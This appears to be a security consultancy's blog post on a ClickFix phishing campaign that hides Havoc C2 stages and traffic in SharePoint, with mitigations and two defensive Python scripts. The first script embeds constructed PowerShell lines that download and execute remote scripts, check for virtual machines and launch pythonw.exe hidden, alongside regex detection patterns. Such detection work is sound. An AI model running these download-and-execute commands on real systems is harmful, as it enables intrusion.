SharePoint Under Siege: The ClickFix Havoc C2 Attack
EJ
Cybercriminals are constantly innovating their methods, and the latest phishing campaign is no exception. In this new attack, threat actors use the ClickFix technique to deliver a modified build of Havoc, an open-source command-and-control (C2) framework, and its Demon agent, while hiding every stage of the infection and the C2 traffic itself behind trusted Microsoft SharePoint sites.
The Anatomy of the Attack
The campaign begins with a phishing email carrying an HTML attachment named “Documents.html.” When opened, the attachment displays a fake error message that instructs the user to “fix” the problem by copying a PowerShell command and running it. This is the ClickFix technique in action: a form of social engineering that gets the victim to execute the first stage with their own hands, so no exploit and no downloaded executable is needed to get started.
Once the victim pastes the command into the Run dialog or a PowerShell window, the next stage is triggered. The command downloads a remote PowerShell script from an attacker-controlled SharePoint site. Before going further, that script checks whether it is running in a sandbox or analysis environment, a common tactic used to thwart automated analysis.
If the environment is deemed safe, the script downloads the Python interpreter (“pythonw.exe”) if it is not already present. With Python in hand, it fetches a Python script from the same SharePoint location. That script is a shellcode loader for KaynLdr, a reflective loader written in C and assembly that loads an embedded Dynamic Link Library (DLL) without touching disk. In this instance, that DLL is the Havoc Demon agent, which gives the attackers full C2 functionality on the host.
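The chain above leaves a recognisable footprint in PowerShell script-block logs: a download from a SharePoint URL piped into execution, a virtual-machine check, a drop of pythonw.exe and a hidden launch. The following triage script is an added example written for this article, not code from the campaign or from Fortinet. The log entries it inspects are constructed to resemble the stages described above; the hostnames, paths and commands are invented placeholders, not the real campaign's indicators.

```python
import re

# Constructed PowerShell script-block contents, invented for this example.
# They mimic the shape of the stages described in the article; they are NOT
# the campaign's real commands, and the SharePoint hosts are placeholders.
SAMPLES = {
    "clickfix_stage1": (
        "$u='https://contoso-my.sharepoint.com/personal/x/Documents/s.ps1';"
        "iex ((New-Object Net.WebClient).DownloadString($u))"
    ),
    "stage2_sandbox_and_python": (
        "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual|VMware') { exit };"
        "$p=\"$env:APPDATA\\pythonw.exe\";"
        "if (!(Test-Path $p)) { Invoke-WebRequest 'https://contoso.sharepoint.com/sites/s/pythonw.exe' -OutFile $p };"
        "Start-Process $p -ArgumentList \"$env:APPDATA\\loader.py\" -WindowStyle Hidden"
    ),
    "benign_admin": (
        "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item"
    ),
    "benign_sharepoint_pnp": (
        "Connect-PnPOnline -Url https://contoso.sharepoint.com/sites/hr -Interactive; Get-PnPList"
    ),
}

# Building blocks of the heuristics. Each regex is case-insensitive.
DOWNLOAD = re.compile(r"(?i)\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|Start-BitsTransfer)\b")
EXECUTE = re.compile(r"(?i)\b(iex|Invoke-Expression)\b")
SHAREPOINT_URL = re.compile(r"(?i)https?://[a-z0-9-]+\.sharepoint\.com/")
HW_QUERY = re.compile(r"(?i)(Win32_ComputerSystem|Win32_BIOS|Win32_VideoController|Get-CimInstance|Get-WmiObject)")
VM_STRINGS = re.compile(r"(?i)(vmware|virtual|vbox|hyper-v|qemu|xen|sandbox)")
PYTHON = re.compile(r"(?i)\bpythonw?\.exe\b")
HIDDEN = re.compile(r"(?i)(-WindowStyle\s+Hidden|-w(indowstyle)?\s+h(idden)?\b|-nop\b|-ep\s+bypass|-ExecutionPolicy\s+Bypass)")


def stage_indicators(script: str) -> set:
    """Return the set of ClickFix/Havoc-staging indicators present in one script block."""
    hits = set()
    downloads = bool(DOWNLOAD.search(script))
    # Stage 1: fetch remote content and execute it in memory.
    if downloads and EXECUTE.search(script):
        hits.add("remote_script_exec")
    # Any stage: payload pulled from a SharePoint tenant rather than a plain URL.
    if downloads and SHAREPOINT_URL.search(script):
        hits.add("sharepoint_fetch")
    # Stage 2: hardware/WMI query compared against virtualisation strings.
    if HW_QUERY.search(script) and VM_STRINGS.search(script):
        hits.add("sandbox_check")
    # Stage 2: a Python interpreter is dropped or launched from user-writable space.
    if PYTHON.search(script):
        hits.add("python_drop")
    # Hidden window or policy-bypass switches on the launch.
    if HIDDEN.search(script):
        hits.add("hidden_launch")
    return hits


def is_suspicious(script: str, threshold: int = 2) -> bool:
    """Two or more independent indicators in one block is worth an analyst's time."""
    return len(stage_indicators(script)) >= threshold


def triage(samples: dict) -> dict:
    """Map each sample name to its sorted indicator list, for reporting."""
    return {name: sorted(stage_indicators(text)) for name, text in samples.items()}


if __name__ == "__main__":
    for name, found in triage(SAMPLES).items():
        flag = "SUSPICIOUS" if is_suspicious(SAMPLES[name]) else "ok"
        print(f"{flag:10} {name}: {found}")
```

A single indicator is not enough on its own: legitimate tooling such as the PnP PowerShell module talks to sharepoint.com constantly, and administrators do download scripts. The value is in the combination (download plus in-memory execution, or a virtualisation check followed by an interpreter drop), which is why the threshold is two.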

Hiding in Plain Sight
One of the most alarming aspects of this campaign is its use of legitimate services to mask malicious activity. The threat actor hosts each malware stage on a SharePoint site and uses a modified version of Havoc Demon that talks to its operators through the Microsoft Graph API. Because the agent never contacts an attacker-owned server directly, its C2 traffic looks like ordinary SharePoint usage to a proxy or firewall, and the destination is a domain that most organisations cannot block.
Once operational, the malware creates two victim-specific files in a SharePoint document library: one into which it writes stolen data and command output, and one from which it reads tasking from the operators. File contents are encrypted with AES-256 in CTR mode, so both the exfiltrated data and the inbound commands are opaque to anyone inspecting the files without the key. What is left for a defender to notice is the behaviour rather than the content: an endpoint that repeatedly reads and writes the same pair of files at a steady cadence.
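The two-file drop box described above is visible in the SharePoint audit trail even though the file contents are encrypted. The script below is an added example written for this article, not code from the campaign, from Fortinet or from Microsoft; it shows one way to surface the pattern. It runs over constructed, simplified Microsoft 365 audit records (the field names Operation, UserId, ObjectId, CreationTime and Workload are real Unified Audit Log fields; the tenant, users, folder and file names are invented) and flags user/file pairs whose activity is frequent and evenly spaced, then looks for a folder where one user is beaconing against two such files.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

# Constructed site URL and records. The field names mirror the Unified Audit
# Log; every user, folder and file name here is invented for the example.
SITE = "https://contoso.sharepoint.com/sites/staging/Shared Documents"


def _records(user, path, ops, offsets_s, start):
    """Build simplified audit records for one user touching one file."""
    return [
        {
            "CreationTime": (start + timedelta(seconds=off)).isoformat(),
            "Operation": ops[i % len(ops)],
            "UserId": user,
            "ObjectId": f"{SITE}/{path}",
            "Workload": "SharePoint",
        }
        for i, off in enumerate(offsets_s)
    ]


START = datetime(2025, 3, 4, 9, 0, tzinfo=timezone.utc)
# A 60-second beacon with a few seconds of jitter (deterministic for the test).
JITTER = [0, 2, -1, 3, -2, 1, 0, 2, -1, 3, -2, 1]
BEACON_TIMES = [60 * i + j for i, j in enumerate(JITTER)]
# A human editing a file on and off over a morning.
IRREGULAR = [0, 30, 630, 675, 2475, 2595, 6195]

RECORDS = (
    _records("alice@contoso.com", "sync/8f3a1c2e/out.dat", ["FileUploaded", "FileModified"], BEACON_TIMES, START)
    + _records("alice@contoso.com", "sync/8f3a1c2e/in.dat", ["FileDownloaded"], [t + 5 for t in BEACON_TIMES], START)
    + _records("bob@contoso.com", "Q1 report.docx", ["FileModified"], [0, 900, 1500, 7200], START)
    + _records("carol@contoso.com", "notes.txt", ["FileModified"], IRREGULAR, START)
)


def find_beacons(records, min_events=6, max_cv=0.25):
    """Return (user, file, count, mean_gap_s, cv) for each user/file pair whose
    accesses are both frequent and evenly spaced, i.e. look machine-driven.
    cv is the coefficient of variation of the inter-event gaps."""
    by_key = defaultdict(list)
    for r in records:
        if r.get("Workload") != "SharePoint":
            continue
        by_key[(r["UserId"], r["ObjectId"])].append(datetime.fromisoformat(r["CreationTime"]))
    hits = []
    for (user, obj), times in by_key.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append((user, obj, len(times), round(avg, 1), round(cv, 3)))
    return hits


def paired_dropboxes(hits):
    """Group beaconing files by user and folder. A folder with two or more such
    files for one user matches the one-file-out, one-file-in drop box above."""
    folders = defaultdict(list)
    for user, obj, *_ in hits:
        folder, _, name = obj.rpartition("/")
        folders[(user, folder)].append(name)
    return {k: sorted(v) for k, v in folders.items() if len(v) >= 2}


if __name__ == "__main__":
    beacons = find_beacons(RECORDS)
    for user, obj, n, gap, cv in beacons:
        print(f"beacon: {user} {obj.rsplit('/', 1)[1]} events={n} gap={gap}s cv={cv}")
    for (user, folder), names in paired_dropboxes(beacons).items():
        print(f"drop box: {user} in {folder}: {names}")
```

The thresholds are deliberately loose; in a real tenant you would tune min_events to your log retention and exclude known sync clients by the record's UserAgent or ApplicationId. The point is that the encryption protects the content, not the timing, and the timing is what gives a beacon away.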
Implications and Industry Observations
This multi-stage attack reflects a disturbing trend among cybercriminals: using open-source frameworks and legitimate services to evade detection. The campaign was documented by Fortinet's FortiGuard Labs. In separate research, Proofpoint has described a division of labour between two threat actor groups, TA2726, which acts as a traffic distributor using tools like Keitaro TDS, and TA2727, the actual malware distributor, whose activity spans Windows, macOS and Android devices. Specialisation of this kind extends a campaign's reach and complicates efforts to track and mitigate the threat, because the group that lures the victim and the group whose payload lands are not the same.
Experts like Eric Schwake, director of cybersecurity strategy at Salt Security, warn that "the tactic of concealing malware stages within SharePoint sites and using the Microsoft Graph API to mask C2 communications is particularly alarming." Thomas Richards, principal consultant at Black Duck, notes that while open-source frameworks have long been exploited by cybercriminals, using trusted Microsoft services to disguise malicious activity represents a new level of sophistication.

How to Protect Your Organization
Mitigating the risks posed by such an advanced campaign requires a multi-layered approach:
- User Training and Awareness: Educate employees on the dangers of phishing and social engineering. Make clear that no legitimate error message, update or website will ever ask them to paste a command into the Run dialog or a PowerShell window.
- Restrict PowerShell Execution: Use AppLocker or Windows Defender Application Control to limit which scripts and interpreters can run, turn on PowerShell script block and module logging so that the pasted command and the downloaded stages are recorded, and alert on command lines that download and execute remote content.
- Monitor SharePoint Activity: Review the SharePoint audit log for unexpected file creations or modifications, especially small files with victim-specific names that one account reads and writes repeatedly at a steady cadence.
- Enhance Threat Detection: Deploy detection that looks for anomalous C2 behaviour rather than just bad domains, since this traffic hides inside legitimate Microsoft Graph API calls to sharepoint.com and cannot be blocked by destination alone.
- Secure API and Network Perimeters: Regularly audit your API permissions, app registrations and network configuration to close loopholes an attacker could use, and treat unfamiliar applications holding Graph permissions to Sites or Files as something to investigate.
In conclusion, the ClickFix campaign highlights how sophisticated cybercriminals have become in leveraging trusted platforms to mask their malicious activities. By embedding their C2 communications within SharePoint and using social engineering to prompt user actions, these attackers are able to bypass traditional defenses and gain deep access into targeted systems. This multi-stage attack not only underscores the need for vigilance but also demonstrates that even familiar services can be exploited in unexpected ways.
Stay Protected with TechHorizon Consulting
At TechHorizon Consulting, we understand that cybercriminals are constantly refining their tactics to exploit unsuspecting users. We specialize in protecting your network and endpoints by fortifying your defenses, enforcing strict authentication protocols, and proactively monitoring for emerging threats—whether they come through SharePoint, email, or any other vector.
If your organization relies on Microsoft services or is concerned about sophisticated phishing campaigns and C2 operations, now is the time to act. Contact TechHorizon Consulting today to assess your security posture and implement advanced protection strategies that guard against emerging cyber threats.